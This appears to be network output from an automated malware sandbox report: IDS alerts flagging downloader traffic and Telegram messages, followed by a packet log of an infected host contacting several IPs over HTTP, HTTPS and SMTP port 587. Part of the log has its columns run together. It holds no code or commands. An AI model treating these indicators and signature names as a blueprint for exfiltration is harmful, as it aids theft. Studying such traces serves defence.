2025-01-14T16:57:20.753551+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49772 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:22.657564+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49785 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:25.601214+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49808 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:28.336258+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49832 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:30.631224+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49843 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:32.292308+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.10 | 49853 | 149.154.167.220 | 443 | TCP
2025-01-14T16:57:35.393995+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49871 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:36.347161+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49871 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:36.898671+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49886 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:37.659625+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49889 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:39.013805+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49901 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:43.615561+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49937 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:46.229378+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49958 | 104.21.96.1 | 443 | TCP
2025-01-14T16:57:47.106264+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.10 | 49962 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Jan 14, 2025 16:57:25.601361990 CET49808443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:25.601805925 CET49808443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:25.605076075 CET4980080192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:25.606321096 CET4981480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:25.610217094 CET8049800132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:25.610271931 CET4980080192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:25.611537933 CET8049814132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:25.611607075 CET4981480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:25.611735106 CET4981480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:25.616472960 CET8049814132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.291223049 CET8049814132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.292397976 CET49822443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:26.292431116 CET44349822104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.292670012 CET49822443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:26.292917967 CET49822443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:26.292934895 CET44349822104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.331562042 CET4981480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:26.745861053 CET44349822104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.753283978 CET49822443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:26.753312111 CET44349822104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.913820982 CET44349822104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.913887024 CET44349822104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.913928032 CET49822443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:26.914629936 CET49822443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:26.918193102 CET4981480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:26.919258118 CET4982780192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:26.923259974 CET8049814132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.923321962 CET4981480192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:26.924041986 CET8049827132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:26.924105883 CET4982780192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:26.924217939 CET4982780192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:26.928930998 CET8049827132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:27.662666082 CET8049827132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:27.678040981 CET49832443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:27.678071022 CET44349832104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:27.678172112 CET49832443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:27.681956053 CET49832443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:27.681967020 CET44349832104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:27.707664967 CET4982780192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:28.165687084 CET44349832104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:28.177932024 CET49832443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:28.177951097 CET44349832104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:28.336280107 CET44349832104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:28.336344957 CET44349832104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:28.336412907 CET49832443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:28.336862087 CET49832443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:28.339716911 CET4982780192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:28.340673923 CET4983880192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:28.345104933 CET8049827132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:28.345254898 CET4982780192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:28.345890045 CET8049838132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:28.345968962 CET4983880192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:28.346054077 CET4983880192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:28.351051092 CET8049838132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.000355005 CET8049838132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.002285004 CET49843443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:30.002320051 CET44349843104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.002549887 CET49843443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:30.002808094 CET49843443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:30.002820969 CET44349843104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.004739046 CET8049838132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.004792929 CET4983880192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:30.004851103 CET8049838132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.004908085 CET4983880192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:30.004977942 CET8049838132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.005218029 CET4983880192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:30.473187923 CET44349843104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.518963099 CET49843443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:30.523400068 CET49843443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:30.523408890 CET44349843104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.631253958 CET44349843104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.631336927 CET44349843104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:30.631386042 CET49843443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:30.631803036 CET49843443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:31.371329069 CET4983880192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:31.376415968 CET8049838132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:31.376472950 CET4983880192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:31.379364967 CET49853443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:31.379400969 CET44349853149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:31.379688025 CET49853443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:31.380170107 CET49853443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:31.380182981 CET44349853149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:31.992348909 CET44349853149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:31.992422104 CET49853443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:31.995270014 CET49853443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:31.995275021 CET44349853149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:31.995577097 CET44349853149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:31.997437000 CET49853443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:32.039344072 CET44349853149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:32.292283058 CET44349853149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:32.292354107 CET44349853149.154.167.220192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:32.292406082 CET49853443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:32.382710934 CET49853443192.168.2.10149.154.167.220
                                                                                                                  Jan 14, 2025 16:57:34.424312115 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:34.429533958 CET8049871132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:34.429625988 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:34.430164099 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:34.434906006 CET8049871132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.132913113 CET8049871132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.138232946 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:35.143021107 CET8049871132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.347882986 CET8049871132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.387661934 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:35.387700081 CET44349877104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.387773991 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:35.393398046 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:35.393420935 CET44349877104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.393995047 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:35.864418983 CET44349877104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.864533901 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:35.866826057 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:35.866842985 CET44349877104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.867093086 CET44349877104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:35.909607887 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:35.963437080 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.011332035 CET44349877104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.074762106 CET44349877104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.074825048 CET44349877104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.074951887 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.079310894 CET49877443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.085391998 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:36.090198040 CET8049871132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.296035051 CET8049871132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.304518938 CET49886443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.304563046 CET44349886104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.304766893 CET49886443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.305140972 CET49886443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.305166006 CET44349886104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.347161055 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:36.759648085 CET44349886104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.761208057 CET49886443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.761243105 CET44349886104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.898715019 CET44349886104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.898781061 CET44349886104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.898909092 CET49886443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.899471045 CET49886443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:36.903608084 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:36.904779911 CET4988980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:36.908626080 CET8049871132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.909619093 CET8049889132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:36.909800053 CET4988980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:36.909823895 CET4987180192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:36.909997940 CET4988980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:36.914822102 CET8049889132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:37.610177994 CET8049889132.226.247.73192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:37.611315012 CET49895443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:37.611344099 CET44349895104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:37.611437082 CET49895443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:37.611696005 CET49895443192.168.2.10104.21.96.1
                                                                                                                  Jan 14, 2025 16:57:37.611706972 CET44349895104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:37.659625053 CET4988980192.168.2.10132.226.247.73
                                                                                                                  Jan 14, 2025 16:57:38.074804068 CET44349895104.21.96.1192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:38.076678038 CET49895443192.168.2.10104.21.96.1
Jan 14, 2025 16:57:38.076694965 CET  443    49895  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:38.233623028 CET  443    49895  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:38.233690977 CET  443    49895  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:38.233939886 CET  49895  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:38.234208107 CET  49895  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:38.237546921 CET  49889  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:38.238924980 CET  49901  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:38.242520094 CET  80     49889  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:38.242602110 CET  49889  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:38.244282961 CET  80     49901  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:38.244345903 CET  49901  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:38.244467020 CET  49901  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:38.249283075 CET  80     49901  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:38.972536087 CET  80     49901  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:38.974045038 CET  49905  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:38.974088907 CET  443    49905  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:38.974308014 CET  49905  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:38.974586010 CET  49905  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:38.974592924 CET  443    49905  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:39.013804913 CET  49901  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:39.466561079 CET  443    49905  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:39.469743967 CET  49905  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:39.469772100 CET  443    49905  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:39.617620945 CET  443    49905  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:39.617696047 CET  443    49905  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:39.617760897 CET  49905  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:39.618231058 CET  49905  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:39.623189926 CET  49911  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:39.629962921 CET  80     49911  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:39.630060911 CET  49911  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:39.630228043 CET  49911  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:39.638650894 CET  80     49911  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:40.353435993 CET  80     49911  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:40.354801893 CET  49914  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:40.354851961 CET  443    49914  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:40.354928017 CET  49914  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:40.355175972 CET  49914  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:40.355191946 CET  443    49914  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:40.393991947 CET  49911  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:40.612255096 CET  49772  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:40.803040028 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:40.807852030 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:40.809551001 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:40.853434086 CET  443    49914  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:40.855618000 CET  49914  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:40.855655909 CET  443    49914  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:40.994121075 CET  443    49914  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:40.994194031 CET  443    49914  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:40.994251966 CET  49914  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:40.995014906 CET  49914  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:40.998528004 CET  49911  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:40.999654055 CET  49921  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:41.003804922 CET  80     49911  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:41.003976107 CET  49911  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:41.004868984 CET  80     49921  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:41.004923105 CET  49921  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:41.005021095 CET  49921  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:41.009752035 CET  80     49921  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:41.558362961 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:41.558599949 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:41.563534021 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:41.699500084 CET  80     49921  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:41.700927019 CET  49927  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:41.700974941 CET  443    49927  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:41.701041937 CET  49927  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:41.701380968 CET  49927  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:41.701392889 CET  443    49927  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:41.705163002 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:41.706146955 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:41.711002111 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:41.753410101 CET  49921  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:41.854944944 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:41.855453968 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:41.860349894 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.009579897 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.009865999 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.014991045 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.158483028 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.158529043 CET  443    49927  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:42.159833908 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.162059069 CET  49927  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:42.162090063 CET  443    49927  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:42.164663076 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.291086912 CET  443    49927  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:42.291151047 CET  443    49927  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:42.291279078 CET  49927  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:42.294835091 CET  49921  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:42.294888020 CET  49927  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:42.296056032 CET  49931  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:42.299861908 CET  80     49921  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:42.299938917 CET  49921  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:42.300847054 CET  80     49931  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:42.300908089 CET  49931  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:42.300997972 CET  49931  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:42.305738926 CET  80     49931  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:42.329303980 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.365375042 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.370196104 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.512981892 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.523631096 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.523727894 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.523766041 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.523766041 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.523802042 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.528528929 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.528542995 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.528759003 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.528769016 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.528868914 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.869824886 CET  587    49918  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:42.925262928 CET  49918  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:42.983154058 CET  80     49931  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:42.984457970 CET  49937  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:42.984508038 CET  443    49937  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:42.984585047 CET  49937  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:42.984858036 CET  49937  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:42.984874964 CET  443    49937  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:43.034632921 CET  49931  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:43.459283113 CET  443    49937  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:43.461002111 CET  49937  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:43.461034060 CET  443    49937  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:43.615575075 CET  443    49937  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:43.615672112 CET  443    49937  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:43.615756989 CET  49937  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:43.616303921 CET  49937  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:43.619079113 CET  49931  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:43.620192051 CET  49941  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:43.624144077 CET  80     49931  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:43.624344110 CET  49931  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:43.624989033 CET  80     49941  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:43.625035048 CET  49941  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:43.625154972 CET  49941  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:43.629911900 CET  80     49941  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:44.302015066 CET  80     49941  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:44.304547071 CET  49946  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:44.304594040 CET  443    49946  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:44.304661036 CET  49946  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:44.304923058 CET  49946  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:44.304930925 CET  443    49946  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:44.347206116 CET  49941  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:44.762238026 CET  443    49946  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:44.764952898 CET  49946  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:44.764985085 CET  443    49946  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:44.909352064 CET  443    49946  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:44.909516096 CET  443    49946  104.21.96.1      192.168.2.10
